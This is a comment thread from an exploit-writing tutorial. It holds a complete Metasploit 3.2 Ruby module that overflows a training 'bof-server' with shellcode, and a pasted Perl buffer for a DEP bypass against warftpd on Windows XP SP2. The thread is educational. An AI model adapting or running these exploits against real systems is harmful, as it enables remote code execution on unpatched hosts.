Comments on: Writing exploits for Metasploit 3.0

By: xipe

xipe — Sat, 26 Jun 2010 12:44:51 +0000

Hi anony,

I tried the exploit (the one you can get in my comment of Sept. 29th 2009) with 3.2 and the latest trunk version (3.4.1-dev r9628) and it seems to work.

Can you post or mail me your code and I will check ?

Best regards,
- Xipe

By: anony

anony — Sat, 26 Jun 2010 04:23:43 +0000

Like the tutorial however I’m having some issues reversing your final product written for 3.2
The metasploit 3.2 version you posted in the comments works just fine but i would like to go through the tutorial still. Because your 3.2 version is the final product i must make some changes so that it can be used in step one of your tutorial. When i do this I keep getting errors such as “undefined method ‘length’”. Have any time for a 3.2 rewrite?

Thanks, hope to see another how-to along these lines.

By: matad0r

matad0r — Sun, 10 Jan 2010 17:13:30 +0000

Hi !
Very very helpful tutorial !
Thanks !

By: xipe

xipe — Tue, 29 Sep 2009 17:23:02 +0000

Hi Elv13,

With metasploit 3.2, some things change concerning the class definition.
You should replace :

require 'msf/core'
module Msf
  # class name should reflect directories
  class Exploits::Windows::Dummy::BofServer < Msf::Exploit::Remote
    include Exploit::Remote::Tcp

with :

require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
        include Msf::Exploit::Remote::Tcp

So the new file would be:

require 'msf/core'
  # class name should reflect directories                                                                                                                                                                                                                                              
  class Metasploit3 < Msf::Exploit::Remote
    include Msf::Exploit::Remote::Tcp
 
    # exploit relative informations
    def initialize(info = {})
      super(update_info(info,
                        'Name'           => 'bof-server exploit',
                        'Description'    => 'This is an exploit for bof-server v0.01',
                        'Author'         => 'xipe', # You ;)
                        'Version'        => '1.0',
                        'Payload'        =>
                        {
                          'Space'    => 500, # Space that payload can use.
                                             # We found that we needed 520 bytes to make the
                                             # bof-server crash, but we will only use 500, as
                                             # the end of this space can be modified by the target
                                             # before returning.
                          'StackAdjustment' => -3500, # Modify stack pointer at shellcode start
                                                      # so it can use the stack without writing
                                                      # on itself.
                          'BadChars' => "\x00\x20\x0D\x0A", # Chars that payloads should not
                                                            # contains.
                        },
                        'Platform'   => 'win',
                        'Targets'    =>
                        [
                         [ 'Windows XP SP2 English',
                             {
                               'Platform' =>'win',
                               'Ret' => 0x22fb65 # Return address.                                                                                                                                                                                                                     
                             }
                          ],
                        ],
                        'DefaultTarget' => 0))
    end
 
    def check
      # Here we should check if the target is vulnerable                                                                                                                                                                                                                               
      # This function should not crash the target                                                                                                                                                                                                                                      
      connect
      buf = "version\n"
      sock.put(buf)
      res = sock.get
      disconnect
      if res =~ /bof-server v0.01/
        return Exploit::CheckCode::Vulnerable
      end
      return Exploit::CheckCode::Safe
    end
 
    def exploit
      # Here we should exploit the target 
      connect
      buf = payload.encoded # Size of the payload is defined by Payload.Space in exploit infos.
      buf << make_nops(20) # Some more bytes, as we defined the payload to be 500 bytes long
      buf << [target.ret].pack('V') # Return address
      sock.put(buf) # send data
      sock.get
      handler # pass the connection to the payload handler
      disconnect
    end
end

Best regards,
- Xipe

By: Elv13

Elv13 — Tue, 29 Sep 2009 15:48:12 +0000

Hi, I try to use this exploit, but always fail with this error:
/opt/metasploit/framework-3.2/modules/exploits/linux/dummy/bof-server.rb: NameError /opt/metasploit/framework-3.2/data/msfweb/vendor/rails/activerecord/lib/../../activesupport/lib/active_support/dependencies.rb:116:in `qualified_const_defined?’: “#::Msf” is not a valid constant name!

I use metasploit from Linux and ported your C code to Linux without much trouble. It seem to work (server crash normally), but I am not able to launch the exploit. I also installed bufserver on windows and try to hack it from Linux, but I fail too. Whats wrong?

By: abhijit mohanta

abhijit mohanta — Tue, 11 Aug 2009 09:14:27 +0000

Hi,

I have one confusion in adding a exploit module to metasploit. that would exploit warftpd on xp sp2 bypass dep.

my $evil = “\xcc” x 485;
$evil .= “\x80\x20\x95\x7c”;
$evil .= “\xff\xff\xff\xff”;
$evil .= “\xf8\xd3\x91\x7c”;
$evil .= “\xff\xff\xff\xff”;
$evil .= “\xcc” x 0×54;
$evil .= pack(“V”, $target->[1]);
$evil .= $shellcode;
$evil .= “\xcc” x (1024 – length($evil));

above is attack vector for DEP bypass acc to skape skywing paper “Bypassing Windows Hardware-enforced Data Execution Prevention”.It is for the metasploit 2.7 that war in perl.

Can u please tell me how to code this in ruby.I have tried it but was not sucessful.

Abhijit

By: Bilal

Bilal — Wed, 05 Aug 2009 01:56:27 +0000

You are a star, you have impressed me and helped me a lot but writing this article. I am doing my project on buffer overflow attack and i have found this article very helpful

Thanks
Bilal

By: xipe

xipe — Sun, 22 Mar 2009 17:22:24 +0000

Hi abhijit,

In this case, the shellcode is on the stack, and the stack address is predictable, so we jump there.
The same result can be achieved in other ways, but this way was the “easy” way IMO.

- Xipe

By: abhijit mohanta

abhijit mohanta — Sat, 21 Mar 2009 12:22:46 +0000

It’s a good tutorial on adding exploit .But you should keep in mind while using return address (‘Ret’ => 0x22fb65 # Return address).A return address should be address of some dll module and not the address directly on stack.An address of a jmp esp or something lke that.
Please give reply

By: Frederic

Frederic — Thu, 18 Dec 2008 16:35:14 +0000

Very good! Nice job! Would be awesome if you created a serie of articles about how to create exploits using Metasploit. Please, all detailed for beginners.
Greate job.